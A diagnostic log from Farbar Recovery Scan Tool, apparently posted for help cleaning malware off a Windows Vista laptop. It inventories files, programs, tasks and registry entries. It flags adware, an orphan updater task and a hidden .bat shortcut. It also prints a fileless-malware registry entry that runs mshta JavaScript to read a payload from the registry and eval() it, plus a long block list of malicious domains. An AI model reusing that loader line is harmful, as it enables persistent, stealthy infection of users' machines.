2016-08-02 11:42 - 2006-11-02 08:47 - 00003168 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-08-02 11:42 - 2006-11-02 08:47 - 00003168 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-08-02 11:40 - 2006-11-02 09:01 - 00032546 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-08-02 11:09 - 2016-04-05 20:48 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-08-02 10:29 - 2016-04-25 17:59 - 00000000 ____D C:\Users\Scott\AppData\Roaming\EPSON
2016-08-01 23:04 - 2016-04-05 20:48 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2016-08-01 23:04 - 2016-04-05 20:48 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2016-08-01 22:28 - 2016-04-05 19:52 - 00000000 ____D C:\Users\Scott\AppData\Local\Apps\2.0
2016-08-01 22:09 - 2010-12-25 13:40 - 00000000 ____D C:\ProgramData\Apple Computer
2016-08-01 20:00 - 2014-12-05 04:42 - 00000850 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-08-01 12:16 - 2014-12-11 01:17 - 00000000 ____D C:\Qoobox
2016-08-01 07:43 - 2016-03-30 21:15 - 00000446 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2016-07-31 22:33 - 2016-04-01 00:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2016-07-31 22:33 - 2014-12-25 01:18 - 00000000 ____D C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-07-31 22:08 - 2016-04-03 10:00 - 00000000 ____D C:\Users\Scott\Documents\BLOG
2016-07-31 21:29 - 2016-03-30 21:14 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-07-31 21:29 - 2006-11-02 07:18 - 00000000 ____D C:\Windows\system32\spool
2016-07-31 21:29 - 2006-11-02 07:18 - 00000000 ____D C:\Windows\registration
2016-07-31 21:29 - 2006-11-02 07:18 - 00000000 ____D C:\Windows\inf
2016-07-31 04:15 - 2006-11-02 08:47 - 00079872 _____ C:\Windows\system32\umstartup.etl
2016-07-31 04:04 - 2006-11-02 06:23 - 00000215 _____ C:\Windows\system.ini
2016-07-30 18:36 - 2016-06-28 10:56 - 00000000 ____D C:\Program Files\Mozilla Firefox
2016-07-30 14:38 - 2006-11-11 03:41 - 00000000 ____D C:\Windows\Panther
2016-07-29 14:56 - 2016-04-03 09:16 - 00000000 ____D C:\ProgramData\McAfee
2016-07-29 10:25 - 2016-04-03 09:16 - 00000000 ____D C:\Program Files\Common Files\McAfee
2016-07-29 10:15 - 2006-11-02 07:18 - 00000000 ____D C:\Windows\rescache
2016-07-29 09:57 - 2006-12-02 14:49 - 00000000 ___HD C:\Program Files\InstallShield Installation Information
2016-07-29 09:55 - 2006-11-02 07:18 - 00000000 ___SD C:\Windows\Downloaded Program Files
2016-07-29 09:55 - 2006-11-02 07:18 - 00000000 ___RD C:\Windows\Offline Web Pages
2016-07-29 09:55 - 2006-11-02 07:18 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-07-29 08:16 - 2006-02-13 13:36 - 00000000 ____D C:\PerfLogs
2016-07-29 08:02 - 2014-12-25 00:14 - 00000000 ____D C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2016-07-29 08:02 - 2010-12-25 13:34 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-07-29 07:57 - 2006-12-05 01:09 - 00000000 ____D C:\Program Files\Common Files\NewTech Infosystems
2016-07-29 05:11 - 2016-03-30 22:32 - 00009019 _____ C:\Windows\wininit.ini
2016-07-28 09:45 - 2014-12-11 01:26 - 00000000 ____D C:\Users\Scott
2016-07-28 09:35 - 2014-12-11 01:48 - 00000808 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-07-27 03:49 - 2016-06-01 11:11 - 00001207 _____ C:\Users\Scott\Desktop\NEW STAMPS - Shortcut.lnk
2016-07-27 02:23 - 2016-03-30 21:15 - 00000616 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2016-07-26 14:24 - 2009-10-02 15:22 - 00406184 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2016-07-22 16:28 - 2014-12-05 05:09 - 00000000 ____D C:\Users\Scott\AppData\LocalLow\Adobe
2016-07-22 07:26 - 2006-11-02 06:23 - 00453031 ____R C:\Windows\system32\Drivers\etc\hosts.20160729-051402.backup
2016-07-19 06:41 - 2006-11-02 06:23 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160722-072520.backup
2016-07-18 22:02 - 2016-06-02 09:46 - 00002732 _____ C:\Users\Scott\Desktop\Listings.txt
2016-07-14 23:23 - 2014-12-05 04:42 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2016-07-14 23:23 - 2006-02-13 02:40 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-07-14 07:15 - 2006-11-02 06:23 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160719-064021.backup
2016-07-14 07:11 - 2014-12-02 17:58 - 00000000 ____D C:\Windows\system32\MRT
2016-07-14 03:48 - 2006-11-02 08:47 - 00392528 _____ C:\Windows\system32\FNTCACHE.DAT
2016-07-14 03:02 - 2006-11-02 06:24 - 141983760 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2016-07-12 12:09 - 2007-06-10 07:07 - 00000000 ____D C:\Windows\system32\Macromed
2016-07-10 05:04 - 2015-10-23 06:15 - 00000000 ____D C:\ProgramData\Package Cache
2016-07-10 04:12 - 2006-11-02 06:23 - 00452979 ____R C:\Windows\system32\Drivers\etc\hosts.20160714-071424.backup
2016-07-10 03:38 - 2006-11-02 06:33 - 00758514 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-07 21:18 - 2016-04-01 00:06 - 00000796 _____ C:\Users\Public\Desktop\QuickTime Player.lnk

==================== Files in the root of some directories =======

2015-02-25 22:22 - 2016-07-31 13:23 - 0005216 _____ () C:\Users\Scott\AppData\Local\d3d9caps.dat
2014-12-25 01:24 - 2016-08-02 10:31 - 0010752 _____ () C:\Users\Scott\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2008-02-25 20:40 - 2016-04-11 01:00 - 0007849 _____ () C:\ProgramData\hpzinstall.log
2007-12-17 21:57 - 2007-12-17 22:07 - 0015116 _____ () C:\ProgramData\LUUnInstall.LiveUpdate

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-08-02 11:56

==================== End of FRST.txt ============================

 

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 27-07-2016
Ran by Scott (2016-08-02 12:09:02)
Running from C:\Users\Scott\Downloads
Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) (2007-03-13 22:25:09)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3182237591-3162957894-2498692213-500 - Administrator - Disabled)
Guest (S-1-5-21-3182237591-3162957894-2498692213-501 - Limited - Disabled)
Scott (S-1-5-21-3182237591-3162957894-2498692213-1002 - Administrator - Enabled) => C:\Users\Scott

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

32 Bit HP CIO Components Installer (Version: 1.0.0 - Hewlett-Packard) Hidden
Acer Assist (HKLM\...\Acer Assist) (Version:  - Acer Inc.)
Acer eLock Management (HKLM\...\{116FF17B-1A30-4FC2-9B01-5BC5BD46B0B3}) (Version: 2.5.3006 - Acer Inc.)
Acer Empowering Technology (HKLM\...\{AB6097D9-D722-4987-BD9E-A076E2848EE2}) (Version: 2.5.3003 - Acer Inc.)
Acer eNet Management (HKLM\...\{C06554A1-2C1E-4D20-B613-EE62C79927CC}) (Version: 2.6.3002 - Acer Inc.)
Acer ePower Management (HKLM\...\{58E5844B-7CE2-413D-83D1-99294BF6C74F}) (Version: 2.5.3007 - Acer Inc.)
Acer ePresentation Management (HKLM\...\{BF839132-BD43-4056-ACBF-4377F4A88E2A}) (Version: 2.5.3003 - Acer Inc.)
Acer eSettings Management (HKLM\...\{CE65A9A0-9686-45C6-9098-3C9543A412F0}) (Version: 2.5.3003 - Acer Inc.)
Acer GridVista (HKLM\...\GridVista) (Version: 2.59.1123 - )
Acer Mobility Center Plug-In (HKLM\...\{11316260-6666-467B-AC34-183FCB5D4335}) (Version: 1.0.3003 - Acer Inc.)
Acer OrbiCam Application (HKLM\...\{0F79C1B2-36B2-4B62-8221-42721CF54638}) (Version: 10.40.1319 - Acer)
Acer ScreenSaver (HKLM\...\{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}) (Version: 1.00.0000 - Acer Inc.)
Acer Tour (HKLM\...\{94389919-B0AA-4882-9BE8-9F0B004ECA35}) (Version: 1.1.3001 - Acer Inc.)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 15.0.0.356 - Adobe Systems Incorporated)
Adobe Flash Player 22 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 22.0.0.210 - Adobe Systems Incorporated)
Adobe Flash Player 22 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 22.0.0.209 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM\...\Adobe Shockwave Player) (Version: 12.1.5.155 - Adobe Systems, Inc.)
Agere Systems HDA Modem (HKLM\...\Agere Systems Soft Modem) (Version:  - Agere Systems)
Apple Application Support (HKLM\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{E14ADE0E-75F3-4A46-87E5-26692DD626EC}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.20 - Piriform)
EPSON Easy Photo Print (HKLM\...\{8A8F8391-4C2C-4BE1-A984-CD4A5A546467}) (Version: 1.5.1.0 - SEIKO EPSON CORPORATION)
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - )
EPSON WorkForce 30 Series Printer Uninstall (HKLM\...\EPSON WorkForce 30 Series) (Version:  - SEIKO EPSON Corporation)
Eraser 6.2.0.2971 (HKLM\...\{F9EA3546-8EBB-49B3-84AC-40269767562C}) (Version: 6.2.2971 - The Eraser Project)
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
Intel® PROSet/Wireless WiFi Software (HKLM\...\{35C0A1E4-D02A-412C-841F-266DBB116ABB}) (Version: 12.02.0000 - Intel® Corporation)
LightScribe  1.4.124.1 (Version: 1.4.124.1 - hxxp://www.lightscribe.com) Hidden
McAfee SecurityCenter (HKLM\...\MSC) (Version: 14.0.339 - McAfee, Inc.)
McAfee SiteAdvisor (HKLM\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 3.7.290 - McAfee, Inc.)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Mozilla Firefox 47.0.1 (x86 en-US) (HKLM\...\Mozilla Firefox 47.0.1 (x86 en-US)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
MSXML 4.0 SP2 (KB927978) (HKLM\...\{37477865-A3F1-4772-AD43-AAFC6BCFF99F}) (Version: 4.20.9841.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB936181) (HKLM\...\{C04E32E0-0416-434D-AFB9-6969D703A9EF}) (Version: 4.20.9848.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB941833) (HKLM\...\{C523D256-313D-4866-B36A-F3DE528246EF}) (Version: 4.20.9849.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My DSC (HKLM\...\{225AF9A1-B556-88D5-94AA-0010B5426419}) (Version:  - )
OpenOffice 4.1.2 (HKLM\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
QuickShare (HKLM\...\{62BC7EFB-47F5-4619-9B74-7DDA72D5AF7E}) (Version: 1.6.1.949 - Linkury Inc.) <==== ATTENTION
QuickTime 7 (HKLM\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5322 - Realtek Semiconductor Corp.)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 9.0.3.0 - Synaptics)
Texas Instruments PCIxx21/x515/xx12 drivers. (HKLM\...\InstallShield_{F7B05784-334C-4F76-8BAB-30ABEB7FD534}) (Version: 1.23.0000 - Texas Instruments Inc.)
TIPCI (Version: 1.23.0000 - Texas Instruments Inc.) Hidden
WorkForce 30 Series Info Center (HKLM\...\Silent Package Run-Time Sample) (Version:  - )

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002_Classes\CLSID\{BC9B776A-90D7-4476-A791-79D835F30650}\InprocServer32 -> C:\Program Files\Eraser\Eraser.Shell.dll (The Eraser Project)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {009FF3C0-2C63-45C9-9B64-43C4F90DF8E4} - System32\Tasks\LaunchSignup => C:\Program Files\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {0EA7907D-B1A0-4351-B51D-9445C6C7E3A9} - System32\Tasks\Acer\Acer Assist\New Message Check - Scott => C:\Program Files\Acer Assist\AcerAssist.exe [2006-12-07] (Acer Inc.)
Task: {1FEFB154-0FDE-406A-9A23-17F7AB5A22C3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: {46915187-2476-47E8-A559-AC136E5B9623} - \Updater26278.exe -> No File <==== ATTENTION
Task: {56359757-5AD7-41EE-8EC5-2175AA01E281} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {569BC13A-3F87-4F71-BBEF-32E92F2F5F27} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
Task: {620CA66F-41E3-47CB-BEBA-F53DCCFBE17C} - System32\Tasks\{7405A8FC-F14B-4911-951F-71D63B7EBC89} => pcalua.exe -a "C:\Program Files\QuickTime\QTSystem\QuickTime.cpl" -c QuickTime
Task: {69DDDA7A-BE28-4DB0-BDAE-EB8D55F222EC} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Signature Update => c:\program files\windows defender\MpCmdRun.exe [2008-01-19] (Microsoft Corporation)
Task: {7D5C45A7-F524-4CA3-AB4E-880DFFB541D0} - System32\Tasks\Scan the system (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {86DCA0FE-8E5A-4673-8256-4A44E3D4BE2A} - System32\Tasks\{361D96D2-3953-46A8-9C2E-9F6695CD3A7C} => pcalua.exe -a E:\setup.exe -d E:\
Task: {93996E05-B471-4434-9763-F5997EBA0E9E} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\VistaSP1CEIP => C:\Windows\servicing\vsp1ceip.exe [2008-01-19] (Microsoft Corporation)
Task: {AD03E781-944B-447D-A206-64A43CC5AEE1} - System32\Tasks\Check for updates (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
Task: {C342F60A-BA9E-49AE-83A4-9C7642C5162B} - System32\Tasks\Refresh immunization (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {D3D993CC-94EC-4AD5-9D81-A3DC156CD314} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-07-13] (Piriform Ltd)
Task: {F5CB4D98-5105-4FB0-BC7E-F5E580C020F4} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-08-01] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk -> C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat ()

==================== Loaded Modules (Whitelisted) ==============

2008-10-16 17:57 - 2008-10-16 17:57 - 00200704 _____ () C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2016-03-30 21:14 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-03-30 21:14 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2012-11-28 15:13 - 2012-11-28 15:13 - 00087952 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2013-06-01 12:13 - 2012-11-28 15:13 - 01242512 _____ () C:\Program Files\Common Files\Apple\Mobile Device Support\libxml2.dll
2016-03-30 21:14 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2007-03-13 18:39 - 2006-11-24 15:57 - 00107008 _____ () C:\Acer\Mobility Center\MobilityService.exe
2007-03-13 18:39 - 2006-10-24 13:54 - 00033280 _____ () C:\Acer\Mobility Center\MobilityInterface.dll
2016-03-30 21:14 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2016-03-30 21:14 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2007-06-10 07:08 - 2006-12-28 18:23 - 00016384 _____ () C:\Acer\Empowering Technology\eRecovery\ServiceInterface.dll
2007-06-10 07:08 - 2006-12-28 18:23 - 00016384 _____ () C:\Acer\Empowering Technology\eRecovery\IERYETF.dll
2007-03-13 18:39 - 2007-01-02 19:46 - 00024576 _____ () C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe
2007-03-13 18:39 - 2007-01-02 19:45 - 00114688 _____ () C:\Acer\Empowering Technology\eSettings\Service\eSettings.Model.Computer.dll
2007-03-13 18:39 - 2007-01-02 19:44 - 00032768 _____ () C:\Acer\Empowering Technology\eSettings\Service\eSettings.Model.ComputerInterfaces.dll
2016-08-01 16:09 - 2016-08-01 16:09 - 01114136 _____ () C:\Users\Scott\AppData\Roaming\Mozilla\Firefox\Profiles\tcdp74my.default-1470081235988\extensions\support@lastpass.com\platform\WINNT_x86-msvc\components\lpxpcom.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\01433936.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\06452831.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\40692755.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\42410430.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\45F8A0B2.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\71479720.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\01433936.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\06452831.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\40692755.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\42410430.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\45F8A0B2.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\71479720.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\imageres.dll,-68 <===== ATTENTION
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Classes\5e097f: "C:\Windows\system32\mshta.exe" "javascript:oB2RUH="oGt";mN71=new ActiveXObject("WScript.Shell");unRi22V="qmhHM";w0TVp=mN71.RegRead("HKCU\\software\\jiun\\thufoby");sh9jvJ="vImph";eval(w0TVp);z83FTbxB="RntD";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

There are 7913 more sites.

IE trusted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\dotpdn.com -> hxxp://www.dotpdn.com
